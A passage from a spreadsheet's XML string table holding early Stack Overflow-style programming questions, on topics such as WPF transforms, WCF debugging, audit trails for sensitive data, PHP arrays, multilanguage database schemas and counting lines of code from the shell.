&lt;p&gt;I'm working on a WPF canvas, which is very large (40,000,000 x 40,000,000), translating and scaling to zoom into it - placing tiles on to it that contain satellite imagery.  To scale and translate I'm using a TransformGroup, containing a ScaleTransform and TranslateTransform.&lt;/p&gt;
&lt;p&gt;When zoomed in close, the tiles seem to wobble about as you slightly adjust the scaletransform, as if their location on the canvas is slightly changing, even though all I'm changing is the scaletransform.  I'm worried that the transforms aren't being done in double-precision, but are being shipped to the hardware and done in single-precision.&lt;/p&gt;
&lt;p&gt;Is there any way to control the precision of render transforms?  Or at least confirm that it's using double-precision and not single-precision?  &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to study design patterns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have read around 4-5 books on design patterns, but still I dont feel I have come closer to intermediate level in design patterns?&lt;/p&gt;
&lt;p&gt;How should I go studying design patterns?&lt;/p&gt;
&lt;p&gt;Is there any best book for design pattern?&lt;/p&gt;
&lt;p&gt;I know this will come only with experience but there must be some way to master these?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to use BindingSource.find on multple columns?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use BindingSource.find on multple columns?&lt;/p&gt;
&lt;p&gt;I have a treeview and a combobox.  The combobox provides the ID that is used to build the treeview.  When I select a node in the tree view I want to display the details/child information for the ID from the combobox and the tag/ID value from the tree Node.  &lt;/p&gt;
&lt;p&gt;What is the best way to do this? I was trying to use controls bound to a binding source. I want to change the position of the binding source, but I need to search the binding source for the value from the combo as well as the tree node I just selected?????&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Model-View-Presenter and Modal Dialog boxes.... How to?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am implementing MVP/M-V-VM in WPF and I'm having good luck with it so far.  However, I don't see how this model supports implementing Modal dialog boxes.  I've derived my work from Crack.NET (&lt;a href="http://www.codeplex.com/cracknetproject" rel="nofollow"&gt;http://www.codeplex.com/cracknetproject&lt;/a&gt;) to learn how this stuff works.&lt;/p&gt;
&lt;p&gt;I have a ShellView view (which is just XAML) that has a menu on it.  The menu binds to a command in the ShellModelView that says "EditPreferences".&lt;/p&gt;
&lt;p&gt;The ShellModelView implements the ICommand for EditPreferences and here we want to put up a dialog box to let the user edit preferences for the application.  &lt;/p&gt;
&lt;p&gt;Several problems here:
1.  The ShellModelView doesn't have a reference to the ShellView to properly parent the dialog.  The ShellModelView is the DataContext of the ShellView but I don't see a backreference that's setup.
2.  The ShellModelView shouldn't be loading explicit UI anyway.  So what's the proper interaction model here?
3.  How do I build up my PreferencesDialog so that it's properly separated between logic and view as well?  PreferencesDialog itself needs to be a Window so you can call ShowDialog on it, but that means you need a reference to the Window (e.g. View) in order to instantiate it.  Ideally I should be able to unit test the code/validation within PreferencesDialog without instantiating the view (using a Mock view perhaps?).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unable to debug WCF service message</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a Visual Studio 2008 solution with a WCF service, and a client.&lt;/p&gt;
&lt;p&gt;When I run my client, and call a method from my service I get a message saying "Unable to automatically debug 'Home.Service'. The remote procedure could not be debugged. This usually indicates that debugging has not been enabled on the server."&lt;/p&gt;
&lt;p&gt;I've googled around, and have tried the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.web&amp;gt;
   &amp;lt;compilation debug="true" /&amp;gt;
&amp;lt;/system.web&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;has been added in app.config on both the client and the server.&lt;/p&gt;
&lt;p&gt;I have also made sure that the project is being compiled in Debug mode.&lt;/p&gt;
&lt;p&gt;What else could be causing this message?&lt;/p&gt;
&lt;p&gt;Edit: Added more info based on feedback questions&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It is using wsHttpBinding&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I have set&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;serviceDebug includeExceptionDetailInFaults="true"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I am using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var service = new HomeReference.HomeServiceClient();
service.ClientCredentials.Windows.ClientCredential = CredentialCache.DefaultNetworkCredentials;
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Unfortunately the error shows up the first time I call a method on my Service. I can dismiss the messagebox, and the application continues working. Any Exceptions thrown on the server at not propagated back to the client though (I assume it should?)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi-lingual projects in Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would anyone know if there are plans or extensions to Visual Studio to allow for multi-lingual projects?&lt;/p&gt;
&lt;p&gt;While the .NET platform is truly polyglot, Visual Studio project are stubbornly monoglot which means that all the work that goes into tooling C# and VB is unusable from newer languages like F# and IronPython.&lt;/p&gt;
&lt;p&gt;PEX is an example of a great extension to Visual Studio that simply doesn't work in F#.&lt;/p&gt;
&lt;p&gt;Wasn't there a module system built into .NET specifically to enable ployglot compilation?&lt;/p&gt;
&lt;p&gt;regards,&lt;/p&gt;
&lt;p&gt;Danny&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Audit trails and implementing SOX/HIPAA/etc, best practices for sensitive data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I consider myself to be relatively proficient in terms of application design, but I've never had to work with sensitive data. I've been wondering about what the best practices were for audit trails and how exactly one should implement them. I don't have to do it right now, but it'd be nice to be able to confidently talk with a medical company if they ask me to do some work for them.&lt;/p&gt;
&lt;p&gt;Let's say we have a "school" database, with 'teachers', 'classes', 'students' all normalized in a many-to-many 'grades' table. What would you log? Every insert/update on the 'grades table'? Only updates (say, a kid breaks in and wants to change grades, this should send up redflags)? Does this vary entirely based on how paranoid one wants to be? Is there a best practice?&lt;/p&gt;
&lt;p&gt;Is this something that should be done in the database? (A trigger on each sensitive SELECT which inserts a row to an 'audit' table logging each query?) What should be logged? Is there functionality automatically built into Oracle/DB2 that do it for you? Should this be application side logic?&lt;/p&gt;
&lt;p&gt;If anyone has any formal documentation/books on how to deal with sensitive data (not quite DoD "Trusted Computing" spec, but something along the lines of that :P), I'd appreciate it. I'm sorry if this question is terribly vague. I realize that this varies from application to application. I just want to hear your detailed experiences with dealing with sensitive data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Practical non-Turing-complete languages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Nearly all programming languages used are &lt;a href="http://en.wikipedia.org/wiki/Turing_Complete"&gt;Turing Complete&lt;/a&gt;, and while this affords the language to represent any &lt;a href="http://en.wikipedia.org/wiki/Computability_theory_(computer_science)"&gt;computable&lt;/a&gt; algorithm, it also comes with its own set of &lt;a href="http://en.wikipedia.org/wiki/Halting_problem"&gt;problems&lt;/a&gt;. Seeing as all the algorithms I write are intended to halt, I would like to be able to represent them in a language that guarantees they will halt.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Regular_Expression"&gt;Regular expressions&lt;/a&gt; used for matching strings and &lt;a href="http://en.wikipedia.org/wiki/Finite_state_machine"&gt;finite state machines&lt;/a&gt; are used when &lt;a href="http://en.wikipedia.org/wiki/Lexing"&gt;lexing&lt;/a&gt;, but I'm wondering if there's a more general, broadly language that's not Turing complete?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;edit:&lt;/strong&gt; I should clarify, by 'general purpose' I don't necessarily want to be able to write all halting algorithms in the language (I don't think that such a language would exist) but I suspect that there are common threads in halting proofs that can be generalized to produce a language in which all algorithms are guaranteed to halt.&lt;/p&gt;
&lt;p&gt;There's also another way to tackle this problem - eliminate the need for theoretically infinite memory. Once you limit the amount of memory the machine is allowed, the number of states the machine is in is finite and countable, and therefore you can determine if the algorithm will halt (by not allowing the machine to move into a state it's been in before).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it advisable to use arrays in Javascript using tens of thousands of indexes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it advisable to use arrays in Javascript using tens of thousands of indexes?&lt;/p&gt;
&lt;p&gt;I have a database which contains a table of static data, meaning that it will never change. In this case would it be advisable to convert this table to a javascript array and look the info up in there when needed? Is this bad practice?&lt;/p&gt;
&lt;p&gt;The table in question contains roughly 40,000 key/value pair entries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF: Adding a Trigger to a Button</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently coding a program with a WPF UI and I have a button which is either close or cancel, depending on if there were any changes made on the page.  To achieve this I want to use a trigger (wrapped in a style) on the button so that when the dependency property HasChanges is true the button will change from "Close" to "Cancel".  So far my program displays "Close" as the button's text, but nothing happens when my dependency property HasChanges becomes true. The WPF page is being written in VB.Net and not XAML.&lt;/p&gt;
&lt;p&gt;So far I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub SetUpMyButton()
    Me.MyButton.Style = Me.GetMyButtonStyle()
End Sub
Private Function GetMyButtonStyle() As Style
    Dim hasChangesTrigger as New Trigger
    hasChangesTrigger.Property = CustomControl.HasChangesProperty
    hasChangesTrigger.Value = True
    hasChangesTrigger.Setters.Add(New Setter(Button.ContentProperty, "Cancel"))
    Dim hasChangesStyle as New Style
    hasChangesStyle.TargetType = GetType(Button)
    hasChangesStyle.Setters.Add(New Setter(Button.ContentProperty, "Close"))
    hasChangesStyle.Triggers.Add(hasChangesTrigger)
    hasChangesStyle.Seal()
    Return hasChangesStyle
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help is greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are some good techniques for performance testing SharePoint web parts and controls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a question about performance testing specific to SharePoint web parts and controls (although standard ASP.NET methods would be applicable as well). I'm wondering what are some good techniques, considering factors such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;caching (what and when should you cache?)&lt;/li&gt;
&lt;li&gt;load balanced servers (storing state)&lt;/li&gt;
&lt;li&gt;interaction with other parts of the page (e.g. multiple JavaScript execution)&lt;/li&gt;
&lt;li&gt;measuring CPU usage for a particular control&lt;/li&gt;
&lt;li&gt;rendered page size&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How do I get images located in my recourse folder into an array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to load 52 images (deck of cards) in gif format from my recourse folder into an Image[] in c#. Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks,
Jon&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to determine the number of days in a month with javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using this function but I'd like to know what's the most efficient and accurate way to get it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function daysInMonth(iMonth, iYear) {
   return 32 - new Date(iYear, iMonth, 32).getDate();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is it possible to have different members in a class document have different colours?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using visual studio 2008 professional and was wondering, how can I have different colours for method calls within class methods, and for properties/fields? This would be good as it would give me a quick visual overview of what my class has too much of (e.g. 20 fields and 2 methods - which will give me some interesting information on my design - not that I do this, anyway).&lt;/p&gt;
&lt;p&gt;Ideally, I'd like to have these members highlighted, as when you step through.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET theme not rendering correctly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small web application which uses themes. The themes work on host, so on preinit, if the host = a, load x theme, if the host = b, load y theme. &lt;/p&gt;
&lt;p&gt;In my code this looks like: &lt;/p&gt;
&lt;p&gt;If request.url.host.contains("a") Then 
Page.Theme = x 
Else 
request.url.host.contains("b") Then 
Page.Theme = y &lt;/p&gt;
&lt;p&gt;I have a url which is a.abc.com and another which is b.abc.com (well it is this structure, but the letters are meaningful/company names). Problem is (and I have done host == ""), when I debug my site on localhost (another clause in the above if block where host = localhost), the style renders perfectly. Alignment of elements are perfect as I expect with the numerical values I have provided for width, margins, etc in the css. But when I use the publish tool of VS2008 (with updatable ticked), and upload to a.abc.com, which has the same stylesheet as localhost (a copy in its own folder), there are all sorts of alignment issues as if I have done no work. Why do my styles render incorrectly @ runtime? If it helps, I am using VS2008 Pro Edition, IIS6 and Windows Server 2003.&lt;/p&gt;
&lt;p&gt;What is frustrating is that the page source indicates the theme is loading ok, as it is referenced in HTML head. So when I publish, the theme for a.abc.com is loaded and referenced. Other than all this information, there is no obvious sign of what the problem is. I haven't tried to conventionally reference a single CSS file in the ASPX markup, but if I did and this worked, then it doesn't explain the problem either, anyway.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails model without database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a Rails (2.1 and 2.2) model with ActiveRecord validations, but without a database table.  What is the most widely used approach?  I've found some plugins that claim to offer this functionality, but many of them don't appear to be widely used or maintained.  What does the community recommend I do?  Right now I am leaning toward coming up with my own solution based on &lt;a href="http://www.prestonlee.com/2007/12/29/rails-20-validations-without-extending-activerecordbase/"&gt;this blog post&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LDAP: why would the following use of DirectoryEntry return no members for a large global security group?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following code works for 90+ % of global security groups, but for one very large global security group, it returns an enumerator, but no member objects of the group, even though the group has many thousands.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DirectoryEntry group = groupResult.GetDirectoryEntry();
filter = "member;range=0-20";
group.RefreshCache(new[] { filter });
PropertyValueCollection groupMembers = group.Properties["member"];
IEnumerator iEnum = groupMembers.GetEnumerator();
//On one large global security group, this returns a valid iEnum, 
//but no member entries.  The group has thousands.
//This code works for every other group I've encountered.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Need tips on how to prioritize and schedule a bunch of work items</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It took me some time, but I've finally managed to write down all the tasks that need to go into Version 1.0 of the software product I'm working on. &lt;/p&gt;
&lt;p&gt;The list is almost 1000 items long.&lt;/p&gt;
&lt;p&gt;We are a 3-person team, and we've somehow managed to get this far using MindMeister, Google Docs, @todos in the code etc. Now, I have everything neatly grouped by feature, but how do I prioritize all this and turn it into a schedule?&lt;/p&gt;
&lt;p&gt;Any advice would be greatly appreciated - I'm not looking for software recommendations, however - I'm seeking advice on how to take this enormous bag of tasks - ranging from bug-fixes to application modules - and find out in what order I should do them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which C++ Library for CGI Programming?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at doing some work (for fun) in a compiled language to run some simple tests and benchmarks against php.&lt;/p&gt;
&lt;p&gt;Basically I'd like to see what other people use for C++ CGI programming. (Including backend database, like mysql++ or something else)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to expose multiple objects to a view in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm kind of new to ASP.NET MVC and to the MVC pattern in general but I'm really digging the concept and the rapidity with which I can compose an app.  One thing that I'm struggling with is how to expose more than one object to a view.  I use a lot of strongly typed views, which works well but what if my view relies on more than one object?  Right now I'm doing something pretty hacky and passing a Dictionary to the view and then just keying the different objects.  Is there a better pattern for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is this a bug with PHP array accessing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I ran into this bug where an element of an array, if its index is the string "0", is inaccessible. &lt;/p&gt;
&lt;p&gt;It's not a bug with unserialize, either, as this occurred in my code without invoking it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$arr = unserialize('a:1:{s:1:"0";i:5;}');
var_dump($arr["0"]); //should be 5, but is NULL
var_dump($arr[0]);   //maybe this would work?  no. NULL
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Am I doing something wrong here?  How do I access this element of the array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can SQL Server Express be used to effectively administrate a SQL Server Standard/Enterprise installation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a number of MS SQL Server 2005 installations (both Standard and Enterprise editions) on our webservers. From time to time I need to administrate them from home. Right now I'm using Remote Desktop to connect to my work machine, but I'd prefer to install SQL Server Management Studio on my home machine so that I can work more efficiently. I don't have a spare license, so I was wondering... if I installed MS SQL Server 2005 Express on my home machine, could I use it to effectively administrate the higher-end installations on our servers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How safe is Greasemonkey?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've never actually used greasemonkey, but I was considering using it.
Considering that GreaseMonkey allows you to let random people on the Internet change the behavior of your favorite websites, how safe can it be?
Can they steal my passwords? Look at my private data? Do things I didn't want to do?
How safe is Greasemonkey?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Profiling Qt application that uses plugins</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a medium sized application written in c++ using Qt. I wanted to profile things to see where my least performant code was so I compiled everything with &lt;code&gt;-pg&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, my application makes use of a &lt;em&gt;lot&lt;/em&gt; of plugins using the QTPlugin mechanism (boils down to a dlopen and a dlsym of a instance object per plugin). I've noticed that gprof doesn't seem to include functions from plugins.&lt;/p&gt;
&lt;p&gt;Yes, the plugins are also compiled with &lt;code&gt;-pg&lt;/code&gt; and all that. Is there anything special I have to do get everything profiled? Or am I missing something simple?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good NumPy clone for Jython?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a relatively new convert to Python.  I've written some code to grab/graph data from various sources to automate some weekly reports and forecasts.  I've been intrigued by the Jython concept, and would like to port some Python code that I've written to Jython.  In order to do this quickly, I need a NumPy clone for Jython (or Java).  Is there anything like this out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Flex ready for prime time?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a project that currently has zero users but we would like to scale up to potentially hundreds.  Currently we are running on a MySQL database with AMFPHP interacting with Flex.  We used Flex because of its robust graphic features (important to this project) and because the initial developer (not me) already knew ActionScript.  We are currently using AIR but might switch to web-based Flash at some point.&lt;/p&gt;
&lt;p&gt;My questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is Flex a good tool for a project like this?&lt;/li&gt;
&lt;li&gt;What are the main limitations of Flex that we might encounter?&lt;/li&gt;
&lt;li&gt;What are other development platforms we might want to consider?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks.
- Dave&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to load viewController from a nib file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Tab bar bases project (along with navigation control), inside a particular tab there is a tableViewLoaded , when i click on the table rows it shoud open another view , ie it pushes another controller , i have a view controller in the MainWindow.nib for this view also with some items like buttons labels , but whn i click it doesnt show up anythng only a blank page cums up , can any one help me out with this . &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the meaning of "..::." in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I saw this signature on the ListView class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ListView..::.ListViewItemCollection Items { get; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I saw that, "What?!"&lt;/p&gt;
&lt;p&gt;I searched "dot dot colon colon dot" and "..::." on Google with no result.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/av0FO.png" alt="alt text"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Parsing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi All i want add the new node as parent node of the old nodes in XML using C#.for example node have the following XMl file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;bookstore&amp;gt;
   &amp;lt;books&amp;gt;
      &amp;lt;author&amp;gt;
      &amp;lt;/author&amp;gt;
   &amp;lt;/books&amp;gt; 
&amp;lt;/bookstore&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;like that now i want add the new like below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;bookstore&amp;gt;
 &amp;lt;newnode&amp;gt;
   &amp;lt;books&amp;gt;
      &amp;lt;author&amp;gt;
      &amp;lt;/author&amp;gt;
   &amp;lt;/books&amp;gt; 
 &amp;lt;/newnode&amp;gt;
&amp;lt;/bookstore&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in Advance
Sekar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to count lines of code including sub-directories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I want to count the lines of code in a project. If all of the files are in the same directory I can execute:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cat * | wc -l
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if there are sub-directories, this doesn't work. For this to work cat would have to have a recursive mode. I suspect this might be a job for xargs, but I wonder if there is a more elegant solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adjusting XML config files from a script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on automating the configuration of several JBoss servers, which involves editing a substantial number of XML files.&lt;/p&gt;
&lt;p&gt;I'd like to script all these changes as much as possible. But the "standard" tools (sed, grep et al) do not work well with XML. Without necessarily resorting to a higher-level language, how can I script e.g. the insertion of a given XML snipper after a given XML element in a certain file?&lt;/p&gt;
&lt;p&gt;Say for instance that my jboss-log4j.xml looks like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- ====================== --&amp;gt;
&amp;lt;!-- More Appender examples --&amp;gt;
&amp;lt;!-- ====================== --&amp;gt;
&amp;lt;!-- Buffer events and log them asynchronously --&amp;gt;
&amp;lt;appender name="ASYNC" class="org.apache.log4j.AsyncAppender"&amp;gt;
  &amp;lt;errorHandler class="org.jboss.logging.util.OnlyOnceErrorHandler"/&amp;gt;
  &amp;lt;appender-ref ref="FILE"/&amp;gt;
  &amp;lt;!--
  &amp;lt;appender-ref ref="CONSOLE"/&amp;gt;
  &amp;lt;appender-ref ref="SMTP"/&amp;gt;
  --&amp;gt;
&amp;lt;/appender&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and that I want to add a new appender-ref element. What's the easiest way to do that from a script?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically updated graphs on a web page - howto?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to understand a good way to design a web page with dynamically updated graphs. It should be something close to what stock market graphs look like (e.g. &lt;a href="http://finance.google.com/finance?q=NASDAQ%3AGOOG" rel="nofollow"&gt;Google Finance&lt;/a&gt;), although with a bit more complicated functionality, which is not the point. Naturally I am thinking of writing an ajaxy-style flash control, which would communicate with the server through, okay, something like XMLHttpRequest, but from within flash code, and draw things basing on data received. Is this doable with flash? Does security model allow such kind of client-server interaction? If yes, could you think of any references for me to get started (similar opensource projects, articles, whatever)? Or should I forget about flash and use a Java applet right away?&lt;/p&gt;
&lt;p&gt;An important thing to note: I don't think I can use Google charting API, because I need also to have user interaction. In the link above to Google Finance the user can drag the graph to and forth with the mouse, that's close to what I need (I will also need to implement some actions from the dropdown menu).&lt;/p&gt;
&lt;p&gt;Thanks for your answers and opinions!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Schema for a multilanguage database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a multilanguage software. As far as the application code goes, localizability is not an issue. We can use language specific resources and have all kinds of tools that work well with them.&lt;/p&gt;
&lt;p&gt;But what is the best approach in defining a multilanguage database schema? Let's say we have a lot of tables (100 or more), and each table can have multiple columns that can be localized (most of nvarchar columns should be localizable). For instance one of the tables might hold product information:&lt;/p&gt;
&lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;CREATE TABLE T_PRODUCT (
  NAME        NVARCHAR(50),
  DESCRIPTION NTEXT,
  PRICE       NUMBER(18, 2)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can think of three approaches to support multilingual text in NAME and DESCRIPTION columns:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Separate column for each language&lt;/p&gt;
&lt;p&gt;When we add a new language to the system, we must create additional columns to store the translated text, like this:&lt;/p&gt;
&lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;CREATE TABLE T_PRODUCT (
  NAME_EN        NVARCHAR(50),
  NAME_DE        NVARCHAR(50),
  NAME_SP        NVARCHAR(50),
  DESCRIPTION_EN NTEXT,
  DESCRIPTION_DE NTEXT,
  DESCRIPTION_SP NTEXT,
  PRICE          NUMBER(18,2)
)
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Translation table with columns for each language&lt;/p&gt;
&lt;p&gt;Instead of storing translated text, only a foreign key to the translations table is stored. The translations table contains a column for each language.&lt;/p&gt;
&lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;CREATE TABLE T_PRODUCT (
  NAME_FK        int,
  DESCRIPTION_FK int,
  PRICE          NUMBER(18, 2)
)
CREATE TABLE T_TRANSLATION (
  TRANSLATION_ID,
  TEXT_EN NTEXT,
  TEXT_DE NTEXT,
  TEXT_SP NTEXT
)
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Translation tables with rows for each language&lt;/p&gt;
&lt;p&gt;Instead of storing translated text, only a foreign key to the translations table is stored. The translations table contains only a key, and a separate table contains a row for each translation to a language.&lt;/p&gt;
&lt;pre class="lang-sql prettyprint-override"&gt;&lt;code&gt;CREATE TABLE T_PRODUCT (
  NAME_FK        int,
  DESCRIPTION_FK int,
  PRICE          NUMBER(18, 2)
)
CREATE TABLE T_TRANSLATION (
  TRANSLATION_ID
)
CREATE TABLE T_TRANSLATION_ENTRY (
  TRANSLATION_FK,
  LANGUAGE_FK,
  TRANSLATED_TEXT NTEXT
)
CREATE TABLE T_TRANSLATION_LANGUAGE (
  LANGUAGE_ID,
  LANGUAGE_CODE CHAR(2)
)
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There are pros and cons to each solution, and I would like to know what are your experiences with these approaches, what do you recommend and how would you go about designing a multilanguage database schema.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Id's in JSF/Seam</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Got a little problem with a Seam application I'm working on and I was wondering if anyone knows a way round it.  I've got a form in my application that uses AJAX to show certain input boxes depending on an item in a dropdown box.  The code works fine except for setting the ID's in my input boxes.  It looks like JSF doesn't let me set an ID via a variable.  Other attributes like "for" in labels are fine.  Here's some code explaining what I mean:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ui:repeat value="#{serviceHome.instance.serviceSettings}" var="currSetting" &amp;gt;
  &amp;lt;li&amp;gt;
    &amp;lt;!-- Imagine the below works out as "settingABC" --&amp;gt;
    &amp;lt;c:set var="labelKey" value="setting#{jsfUtils.removeWhitespace(currSetting.key.name)}" /&amp;gt;
    &amp;lt;!-- Labelkey is correctly added into this input so for = "settingABC" --&amp;gt;
    &amp;lt;h:outputLabel for="#{labelKey}" styleClass="required generated" value="#{currSetting.key.name}:"/&amp;gt;
    &amp;lt;s:decorate styleClass="errorwrapper"&amp;gt;
      &amp;lt;!-- Labelkey ISN'T correctly added into this input. Instead we just get "setting" --&amp;gt;
      &amp;lt;h:inputText id="#{labelKey}" value="#{currSetting.value}"/&amp;gt;
      &amp;lt;a4j:outputPanel ajaxRendered="true"&amp;gt;
        &amp;lt;h:message for="#{labelKey}" styleClass="errormessage" /&amp;gt;
      &amp;lt;/a4j:outputPanel&amp;gt;
    &amp;lt;/s:decorate&amp;gt;
  &amp;lt;/li&amp;gt;
&amp;lt;/ui:repeat&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone have any idea how I can get past this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I launch the default media player from a .NET application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to launch a media file from a URL from within my c# .NET application. Is there any way to do this natively in .NET? I don't need an embedded player, I just need the default player to launch. I have tried &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Diagnostics.Process.Start("File URL");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but it launches the default browser and downloads the file, instead of attempting to play it in WMP/VLC/whatever the default media player is. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drag'n'drop one or more mails from Outlook to C# WPF application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a windows client written in WPF with C# on .Net 3.5 Sp1, where a requirement is that data from emails received by clients can be stored in the database. Right now the easiest way to handle this is to copy and paste the text, subject, contact information and time received manually using an arthritis-inducing amount of ctrl-c/ctrl-v.&lt;/p&gt;
